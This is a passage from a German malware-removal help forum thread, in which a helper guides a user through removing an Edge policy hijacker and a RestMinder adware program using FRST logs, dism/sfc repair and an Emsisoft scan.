Berichtskennung: f145e9c6-053c-427d-9b99-0ac064ff5160 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Systemfehler: ============= Error: (06/20/2022 05:30:21 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "SCC-Dienst" wurde unerwartet beendet. Dies ist bereits 2 Mal passiert. Error: (06/20/2022 05:29:22 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "SCC-Dienst" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Error: (06/20/2022 05:29:14 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Der Dienst "cplspcon" wurde mit folgendem Fehler beendet: Unbekannter Fehler Error: (06/20/2022 05:28:51 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT) Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet. Modulpfad: C:\Windows\system32\IntelIHVRouter08.dll Error: (06/20/2022 05:28:51 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT) Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet. Modulpfad: C:\Windows\system32\IntelIHVRouter08.dll Error: (06/20/2022 05:28:51 PM) (Source: DCOM) (EventID: 10005) (User: Pauls_Gaming_PC) Description: Fehler "1053" in DCOM, als der Dienst "asComSvc" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden: {BC50CF2A-E12C-4F18-90CE-714CC8600CEE} Error: (06/20/2022 05:28:51 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst ASUS Com Service erreicht. Error: (06/20/2022 05:28:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "SCC-Dienst" wurde unerwartet beendet. Dies ist bereits 4 Mal passiert. Windows Defender: ================ Date: 2022-06-20 17:18:28 Description: Der überwachte Ordnerzugriff hat C:\Program Files (x86)\LightingService\LightingService.exe daran gehindert, Änderungen am Speicher durchzuführen. Erkennungszeit: 2022-06-20T15:18:28.543Z Benutzer: NT-AUTORITÄT\SYSTEM Pfad: \Device\Harddisk0\DR0 Name des Prozesses: C:\Program Files (x86)\LightingService\LightingService.exe Sicherheitsversion: 1.367.1868.0 Modulversion: 1.1.19200.6 Produktversion: 4.18.2203.5 Date: 2022-06-20 17:13:45 Description: C:\Program Files (x86)\Common Files\InstallShield\Engine\6\Intel 32\IKernel.exe wurde durch den überwachten Ordnerzugriff daran gehindert, %userprofile%\Documents zu ändern. Erkennungszeit: 2022-06-20T15:13:45.707Z Benutzer: (unknown user) Pfad: %userprofile%\Documents Prozessname: C:\Program Files (x86)\Common Files\InstallShield\Engine\6\Intel 32\IKernel.exe Sicherheitsversion: 1.367.1868.0 Modulversion: 1.1.19200.6 Produktversion: 4.18.2203.5 Date: 2022-06-20 17:13:45 Description: C:\Program Files (x86)\Common Files\InstallShield\Engine\6\Intel 32\IKernel.exe wurde durch den überwachten Ordnerzugriff daran gehindert, %userprofile%\Documents zu ändern. Erkennungszeit: 2022-06-20T15:13:45.707Z Benutzer: (unknown user) Pfad: %userprofile%\Documents Prozessname: C:\Program Files (x86)\Common Files\InstallShield\Engine\6\Intel 32\IKernel.exe Sicherheitsversion: 1.367.1868.0 Modulversion: 1.1.19200.6 Produktversion: 4.18.2203.5 Date: 2022-06-20 13:40:17 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. Überprüfungs-ID: {C87C1188-4507-4039-B87B-BCFEC9930916} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Date: 2022-06-19 21:22:39 Description: Der überwachte Ordnerzugriff hat C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe daran gehindert, Änderungen am Speicher durchzuführen. Erkennungszeit: 2022-06-19T19:22:39.917Z Benutzer: NT-AUTORITÄT\SYSTEM Pfad: \Device\Harddisk0\DR0 Name des Prozesses: C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe Sicherheitsversion: 1.367.1823.0 Modulversion: 1.1.19200.6 Produktversion: 4.18.2203.5 Event[0] Date: 2022-06-02 12:57:43 Description: Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten. Neue Version der Sicherheitsinformationen: %Vorherige Version der Sicherheitsinformationen: 1.367.893.0 Update Source: Microsoft Update-Server Sicherheitstyp: AntiVirus Updatetyp: Voll Benutzer: NT-AUTORITÄT\SYSTEM Aktuelle Modulversion: %Vorherige Modulversion: 1.1.19200.6 Fehlercode: 0x80240438 Fehlerbeschreibung: Unerwartetes Problem bei der Überprüfung auf Updates. Informationen zum Installieren von Updates oder zur Problembehandlung finden Sie unter "Hilfe und Support". CodeIntegrity: =============== Date: 2022-06-06 20:42:25 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Spybot - Search & Destroy 2\SDLicense.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2022-06-06 20:15:19 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Speicherinformationen =========================== BIOS: American Megatrends Inc. 0418 10/12/2021 Hauptplatine: ASUSTeK COMPUTER INC. TUF GAMING B660-PLUS WIFI D4 Prozessor: 12th Gen Intel(R) Core(TM) i5-12400 Prozentuale Nutzung des RAM: 20% Installierter physikalischer RAM: 32509.4 MB Verfügbarer physikalischer RAM: 25707.66 MB Summe virtueller Speicher: 37373.4 MB Verfügbarer virtueller Speicher: 27895.09 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:930.79 GB) (Free:245.17 GB) (Model: Samsung SSD 970 EVO Plus 1TB) NTFS \\?\Volume{0816333f-f890-4581-955e-76fe023609d7}\ () (Fixed) (Total:0.6 GB) (Free:0.08 GB) NTFS \\?\Volume{77f49904-ead3-4c93-8b25-6a0466739b74}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32 ==================== MBR & Partitionstabelle ==================== ========================================================== Disk: 0 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000) Partition: GPT. ==================== Ende von Addition.txt ======================= |
20.06.2022, 16:54 | #8 |
/// TB-Ausbilder | Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung Gut gemacht. Vielen Dank für die ausführliche Rückmeldung, so wünschen wir uns das. Die Meldung der Firewall kommt, da wir diese zurücksetzen mussten. Wenn eine App legitim ist, dann bitte zulassen. Wir überprüfen die Windows Systemdateien auf Schäden und lassen diese ggf. reparieren. Dies kann etwas dauern, bitte gedulde dich. Danach noch eine Kontrolle mit Emsisoft. Schritt 1 WARNUNG AN ALLE MITLESER !!! Dieses FRST-Script ist ausschließlich für diesen Nutzer gedacht und sollte niemals 1:1 für ein anderes System angewendet werden!
Schritt 2 Führe Emsisoft Emergency Kit (EEK) gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei. Bitte poste mit deiner nächsten Antwort:
|
20.06.2022, 17:52 | #9 |
| Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung FRST hat vor der Ausführung vom Desktop als Administrator, ein Update durchgeführt. Die alte Programmversion befindet sich auf dem Desktop im Ordner "FRST-OlderVersion". Danach wurde gemäß Meldung, ein Neustart durchgeführt. Im Anschluss wurde EEK, gemäß Anleitung, ausgeführt. Fixlog: Code:
ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 20-06-2022 durchgeführt von Pauli (20-06-2022 18:38:38) Run:2 Gestartet von C:\Users\Pauli\Desktop Geladene Profile: Pauli Start-Modus: Normal ============================================== fixlist Inhalt: ***************** CloseProcesses: GroupPolicyUsers\S-1-5-21-1424437550-2087844553-323541659-1001\User: Beschränkung <==== ACHTUNG Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG CMD: dism /online /cleanup-image /restorehealth CMD: sfc /scannow Reboot: ***************** Prozesse erfolgreich geschlossen. C:\Windows\system32\GroupPolicyUsers\S-1-5-21-1424437550-2087844553-323541659-1001\User => erfolgreich verschoben C:\ProgramData\NTUSER.pol => erfolgreich verschoben ========= dism /online /cleanup-image /restorehealth ========= Tool zur Imageverwaltung fr die Bereitstellung Version: 10.0.22000.653 Abbildversion: 10.0.22000.739 [== 3.8% ] [== 4.8% ] [=== 5.7% ] [=== 6.7% ] [==== 7.7% ] [===== 8.7% ] [===== 9.7% ] [====== 10.6% ] [====== 11.6% ] [======= 12.6% ] [======= 13.6% ] [======== 14.6% ] [========= 15.5% ] [========= 16.5% ] [========= 17.2% ] [========== 17.7% ] [========== 18.4% ] [========== 18.7% ] [=========== 19.7% ] [=========== 20.7% ] [============ 21.7% ] [============= 22.6% ] [============= 23.6% ] [============== 24.6% ] [============== 25.6% ] [=============== 26.6% ] [=============== 27.5% ] [================ 28.5% ] [================= 29.5% ] [================= 30.5% ] [================== 31.5% ] [================== 32.5% ] [================== 32.8% ] [=================== 33.7% ] [==================== 34.7% ] [==================== 35.2% ] [===================== 36.2% ] [===================== 36.8% ] [===================== 37.4% ] [====================== 38.0% ] [====================== 38.7% ] [====================== 39.5% ] [======================= 40.5% ] [======================== 41.5% ] [======================== 42.4% ] [========================= 43.4% ] [========================= 44.0% ] [========================= 44.2% ] [========================== 45.1% ] [========================== 46.0% ] [===========================47.0% ] [===========================47.8% ] [===========================48.8% ] [===========================49.8% ] [===========================50.8% ] [===========================51.8% ] [===========================52.8% ] [===========================53.4% ] [===========================53.5% ] [===========================53.7% ] [===========================53.7% ] [===========================53.8% ] [===========================53.8% ] [===========================54.0% ] [===========================54.0% ] [===========================54.1% ] [===========================54.2% ] [===========================54.3% ] [===========================54.3% ] [===========================54.3% ] [===========================54.4% ] [===========================54.6% ] [===========================54.6% ] [===========================54.8% ] [===========================55.0% ] [===========================55.8% ] [===========================56.8% ] [===========================57.7%= ] [===========================58.7%== ] [===========================59.7%== ] [===========================62.3%==== ] [===========================84.9%================= ] [==========================100.0%==========================] Der Wiederherstellungsvorgang wurde erfolgreich abgeschlossen. Der Vorgang wurde erfolgreich beendet. ========= Ende von CMD: ========= ========= sfc /scannow ========= Systemsuche wird gestartet. Dieser Vorgang kann einige Zeit dauern. Überprüfungsphase der Systemsuche wird gestartet. Überprüfung 0 % abgeschlossen. Überprüfung 1 % abgeschlossen. Überprüfung 1 % abgeschlossen. Überprüfung 2 % abgeschlossen. Überprüfung 2 % abgeschlossen. Überprüfung 3 % abgeschlossen. Überprüfung 4 % abgeschlossen. Überprüfung 4 % abgeschlossen. Überprüfung 5 % abgeschlossen. Überprüfung 5 % abgeschlossen. Überprüfung 6 % abgeschlossen. Überprüfung 6 % abgeschlossen. Überprüfung 7 % abgeschlossen. Überprüfung 8 % abgeschlossen. Überprüfung 8 % abgeschlossen. Überprüfung 9 % abgeschlossen. Überprüfung 9 % abgeschlossen. Überprüfung 10 % abgeschlossen. Überprüfung 11 % abgeschlossen. Überprüfung 11 % abgeschlossen. Überprüfung 12 % abgeschlossen. Überprüfung 12 % abgeschlossen. Überprüfung 13 % abgeschlossen. Überprüfung 13 % abgeschlossen. Überprüfung 14 % abgeschlossen. Überprüfung 15 % abgeschlossen. Überprüfung 15 % abgeschlossen. Überprüfung 16 % abgeschlossen. Überprüfung 16 % abgeschlossen. Überprüfung 17 % abgeschlossen. Überprüfung 17 % abgeschlossen. Überprüfung 18 % abgeschlossen. Überprüfung 19 % abgeschlossen. Überprüfung 19 % abgeschlossen. Überprüfung 20 % abgeschlossen. Überprüfung 20 % abgeschlossen. Überprüfung 21 % abgeschlossen. Überprüfung 22 % abgeschlossen. Überprüfung 22 % abgeschlossen. Überprüfung 23 % abgeschlossen. Überprüfung 23 % abgeschlossen. Überprüfung 24 % abgeschlossen. Überprüfung 24 % abgeschlossen. Überprüfung 25 % abgeschlossen. Überprüfung 26 % abgeschlossen. Überprüfung 26 % abgeschlossen. Überprüfung 27 % abgeschlossen. Überprüfung 27 % abgeschlossen. Überprüfung 28 % abgeschlossen. Überprüfung 28 % abgeschlossen. Überprüfung 29 % abgeschlossen. Überprüfung 30 % abgeschlossen. Überprüfung 30 % abgeschlossen. Überprüfung 31 % abgeschlossen. Überprüfung 31 % abgeschlossen. Überprüfung 32 % abgeschlossen. Überprüfung 33 % abgeschlossen. Überprüfung 33 % abgeschlossen. Überprüfung 34 % abgeschlossen. Überprüfung 34 % abgeschlossen. Überprüfung 35 % abgeschlossen. Überprüfung 35 % abgeschlossen. Überprüfung 36 % abgeschlossen. Überprüfung 37 % abgeschlossen. Überprüfung 37 % abgeschlossen. Überprüfung 38 % abgeschlossen. Überprüfung 38 % abgeschlossen. Überprüfung 39 % abgeschlossen. Überprüfung 39 % abgeschlossen. Überprüfung 40 % abgeschlossen. Überprüfung 41 % abgeschlossen. Überprüfung 41 % abgeschlossen. Überprüfung 42 % abgeschlossen. Überprüfung 42 % abgeschlossen. Überprüfung 43 % abgeschlossen. Überprüfung 44 % abgeschlossen. Überprüfung 44 % abgeschlossen. Überprüfung 45 % abgeschlossen. Überprüfung 45 % abgeschlossen. Überprüfung 46 % abgeschlossen. Überprüfung 46 % abgeschlossen. Überprüfung 47 % abgeschlossen. Überprüfung 48 % abgeschlossen. Überprüfung 48 % abgeschlossen. Überprüfung 49 % abgeschlossen. Überprüfung 49 % abgeschlossen. Überprüfung 50 % abgeschlossen. Überprüfung 50 % abgeschlossen. Überprüfung 51 % abgeschlossen. Überprüfung 52 % abgeschlossen. Überprüfung 52 % abgeschlossen. Überprüfung 53 % abgeschlossen. Überprüfung 53 % abgeschlossen. Überprüfung 54 % abgeschlossen. Überprüfung 55 % abgeschlossen. Überprüfung 55 % abgeschlossen. Überprüfung 56 % abgeschlossen. Überprüfung 56 % abgeschlossen. Überprüfung 57 % abgeschlossen. Überprüfung 57 % abgeschlossen. Überprüfung 58 % abgeschlossen. Überprüfung 59 % abgeschlossen. Überprüfung 59 % abgeschlossen. Überprüfung 60 % abgeschlossen. Überprüfung 60 % abgeschlossen. Überprüfung 61 % abgeschlossen. Überprüfung 62 % abgeschlossen. Überprüfung 62 % abgeschlossen. Überprüfung 63 % abgeschlossen. Überprüfung 63 % abgeschlossen. Überprüfung 64 % abgeschlossen. Überprüfung 64 % abgeschlossen. Überprüfung 65 % abgeschlossen. Überprüfung 66 % abgeschlossen. Überprüfung 66 % abgeschlossen. Überprüfung 67 % abgeschlossen. Überprüfung 67 % abgeschlossen. Überprüfung 68 % abgeschlossen. Überprüfung 68 % abgeschlossen. Überprüfung 69 % abgeschlossen. Überprüfung 70 % abgeschlossen. Überprüfung 70 % abgeschlossen. Überprüfung 71 % abgeschlossen. Überprüfung 71 % abgeschlossen. Überprüfung 72 % abgeschlossen. Überprüfung 73 % abgeschlossen. Überprüfung 73 % abgeschlossen. Überprüfung 74 % abgeschlossen. Überprüfung 74 % abgeschlossen. Überprüfung 75 % abgeschlossen. Überprüfung 75 % abgeschlossen. Überprüfung 76 % abgeschlossen. Überprüfung 77 % abgeschlossen. Überprüfung 77 % abgeschlossen. Überprüfung 78 % abgeschlossen. Überprüfung 78 % abgeschlossen. Überprüfung 79 % abgeschlossen. Überprüfung 79 % abgeschlossen. Überprüfung 80 % abgeschlossen. Überprüfung 81 % abgeschlossen. Überprüfung 81 % abgeschlossen. Überprüfung 82 % abgeschlossen. Überprüfung 82 % abgeschlossen. Überprüfung 83 % abgeschlossen. Überprüfung 84 % abgeschlossen. Überprüfung 84 % abgeschlossen. Überprüfung 85 % abgeschlossen. Überprüfung 85 % abgeschlossen. Überprüfung 86 % abgeschlossen. Überprüfung 86 % abgeschlossen. Überprüfung 87 % abgeschlossen. Überprüfung 88 % abgeschlossen. Überprüfung 88 % abgeschlossen. Überprüfung 89 % abgeschlossen. Überprüfung 89 % abgeschlossen. Überprüfung 90 % abgeschlossen. Überprüfung 90 % abgeschlossen. Überprüfung 91 % abgeschlossen. Überprüfung 92 % abgeschlossen. Überprüfung 92 % abgeschlossen. Überprüfung 93 % abgeschlossen. Überprüfung 93 % abgeschlossen. Überprüfung 94 % abgeschlossen. Überprüfung 95 % abgeschlossen. Überprüfung 95 % abgeschlossen. Überprüfung 96 % abgeschlossen. Überprüfung 96 % abgeschlossen. Überprüfung 97 % abgeschlossen. Überprüfung 97 % abgeschlossen. Überprüfung 98 % abgeschlossen. Überprüfung 99 % abgeschlossen. Überprüfung 99 % abgeschlossen. Überprüfung 100 % abgeschlossen. Der Windows-Ressourcenschutz hat beschädigte Dateien gefunden und erfolgreich repariert. Bei Onlinereparaturen finden Sie Details in der CBS-Protokolldatei unter windir\Logs\CBS\CBS.log. Beispiel C:\Windows\Logs\CBS\CBS.log. Bei Offlinereparaturen finden Sie Details in der durch das /OFFLOGFILE-Kennzeichen angegebenen Protokolldatei. ========= Ende von CMD: ========= Das System musste neu gestartet werden. ==== Ende von Fixlog 18:40:36 ==== EEK Log: Code:
ATTFilter Emsisoft Emergency Kit – Version 2022.1 Letztes Update: 20.06.2022 18:42:37 Eigene Pauls_Gaming_PC\Pauli PAULS_GAMING_PC Windows 10x64 Scan-Einstellungen: Scan-Methode: Malware-Scan Objekte: Rootkits, Speicher, Spuren, Dateien PUPs-Erkennung: An Archive scannen: Aus E-Mail-Archive scannen: Aus ADS-Scan: An Direkter Festplattenzugriff: Aus Scan-Beginn: 20.06.2022 18:43:32 C:\Users\Pauli\AppData\Local\Programs\RestMinder\RestMinder.exe erkannt: Application.Deceptor.BFM (B) [krnl.xmd] C:\Users\Pauli\AppData\Local\Programs\RestMinder\sdk.dll erkannt: Application.Deceptor.BFO (B) [krnl.xmd] Gescannt: 80716 Gefunden 2 Scan-Ende: 20.06.2022 18:44:42 Scan-Zeit: 0:01:10 |
20.06.2022, 19:49 | #10 |
/// TB-Ausbilder | Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung Gut gemacht. Ein Spezialsuche mit FRST bitte: Schritt 1
|
20.06.2022, 20:58 | #11 |
| Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung FRST Suche auf Desktop, als Admin ausgeführt: Code:
ATTFilter Farbar Recovery Scan Tool (x64) Version: 20-06-2022 durchgeführt von Pauli (20-06-2022 21:55:12) Gestartet von C:\Users\Pauli\Desktop Start-Modus: Normal ================== Datei-Suche: "SearchAll: RestMinder" ============= Datei: ======== C:\Windows\Prefetch\RESTMINDER.EXE-37614B0C.pf [2022-05-13 19:47][2022-05-13 19:47] 000013979 _____ () 4E1FF1AD0B20EDBDDA25A418D6A1CFD5 [Datei ist nicht signiert] C:\Users\Pauli\AppData\Local\Programs\RestMinder\RestMinder.exe [2022-05-13 19:47][2021-09-06 12:55] 000199232 _____ () 22A05DE9CABBDCFEBA011A358B89A576 [Datei ist digital signiert] Ordner: ======== 2022-05-13 19:47 - 2022-05-13 20:04 _____ C:\Users\Pauli\AppData\Local\Programs\RestMinder Registry: ======== [HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RestMinder_RASAPI32] [HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RestMinder_RASMANCS] [HKEY_USERS\S-1-5-21-1424437550-2087844553-323541659-1001\Software\Microsoft\Windows\CurrentVersion\Search\JumplistData] "C:\Users\Pauli\AppData\Local\Programs\RestMinder\RestMinder.exe"="132969386953263259" [HKEY_USERS\S-1-5-21-1424437550-2087844553-323541659-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store] "C:\Users\Pauli\AppData\Local\Programs\RestMinder\RestMinder.exe"="0x5341435001000000000000000700000028000000400A0300125C030001000000000000000000000A0021000010245A0F035AD701000000000000000002000000280000000000000000000000000000000000000000000000000000003F000000000000000300000003000000" [HKEY_USERS\S-1-5-21-1424437550-2087844553-323541659-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store] "C:\Users\Pauli\AppData\Local\Programs\RestMinder\unins000.exe"="0x534143500100000000000000070000002800000040C42700B62D280001000000000000000000000A0021000010245A0F035AD70100000000000000000200000028000000000000000000001000000000000000000000000000000000B1140000000000000100000001000000" ====== Ende von Suche ====== |
21.06.2022, 12:49 | #12 |
/// TB-Ausbilder | Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung Sehr gut. Ein (hoffentlich) letzter kurzer Fix mit FRST: Schritt 1 WARNUNG AN ALLE MITLESER !!! Dieses FRST-Script ist ausschließlich für diesen Nutzer gedacht und sollte niemals 1:1 für ein anderes System angewendet werden!
|
21.06.2022, 16:55 | #13 |
| Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung FRST als Admin ausgeführt, danach Neustart aufgrund von Meldung. Code:
ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 20-06-2022 durchgeführt von Pauli (21-06-2022 17:53:20) Run:3 Gestartet von C:\Users\Pauli\Desktop Geladene Profile: Pauli Start-Modus: Normal ============================================== fixlist Inhalt: ***************** CloseProcesses: Unlock: C:\Users\Pauli\AppData\Local\Programs\RestMinder VirusTotal: C:\Users\Pauli\AppData\Local\Programs\RestMinder\RestMinder.exe VirusTotal: C:\Users\Pauli\AppData\Local\Programs\RestMinder\sdk.dll C:\Users\Pauli\AppData\Local\Programs\RestMinder DeleteKey: HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\RestMinder_RASAPI32 DeleteKey: HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\RestMinder_RASMANCS Reboot: ***************** Prozesse erfolgreich geschlossen. "C:\Users\Pauli\AppData\Local\Programs\RestMinder" => wurde entsperrt VirusTotal: C:\Users\Pauli\AppData\Local\Programs\RestMinder\RestMinder.exe => https://www.virustotal.com/gui/file/f76cccdbcd4f5db33c83c2ae63ba85134b5984bdc36fdba3a1deb858e12f964a/detection/f-f76cccdbcd4f5db33c83c2ae63ba85134b5984bdc36fdba3a1deb858e12f964a-1655498393 VirusTotal: C:\Users\Pauli\AppData\Local\Programs\RestMinder\sdk.dll => https://www.virustotal.com/gui/file/e58cf9d6a9e36e04f77520ae5f36a89d4e3591e2177dd4241546bf1c2c52b2e8/detection/f-e58cf9d6a9e36e04f77520ae5f36a89d4e3591e2177dd4241546bf1c2c52b2e8-1654490807 C:\Users\Pauli\AppData\Local\Programs\RestMinder => erfolgreich verschoben HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\RestMinder_RASAPI32 => erfolgreich entfernt HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\RestMinder_RASMANCS => erfolgreich entfernt Das System musste neu gestartet werden. ==== Ende von Fixlog 17:53:25 ==== |
21.06.2022, 19:41 | #14 |
/// TB-Ausbilder | Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung Dann wären wir durch! Wenn du keine Probleme mehr mit Malware hast, dann sind wir hier fertig. Deine Logdateien sind sauber. Wenn Du möchtest, kannst Du hier sagen, ob du mit mir und meiner Hilfe zufrieden warst... Vielleicht möchtest du das Forum mit einer kleinen Spende unterstützen. Schritt 1
Zum Schluss bitte unbedingt die Sicherheitsmaßnahmen lesen und umsetzen: Hinweis: Bitte gib mir eine kurze Rückmeldung, sobald du die oben verlinkten Informationen gelesen hast, alles erledigt ist und keine Fragen mehr vorhanden sind, so dass ich dieses Thema aus meinen Abos löschen kann. |
22.06.2022, 07:51 | #15 |
| Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung Alle Informationen wurden gelesen und was möglich ist, wurde umgesetzt, sofern nicht vorab schon entsprechend eingestellt. Ich habe keine weiteren Fragen und bedanke mich nochmals für deine großartige Unterstützung! Im "Erinnerung an meinen Thread" Thread habe ich bereits gepostet und eine kleine Spende wurde via PP, überwiesen. Viele Grüße Nils |
Themen zu Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung |
administrator, asus, browser, computer, dateien, dll, geforce, generic, google, internet, log, malwarebytes, microsoft, nvcontainer, nvcontainer.exe, nvidia, opera, ordner, prozesse, realtek, registry, server, services.exe, software, svchost.exe, system, windows |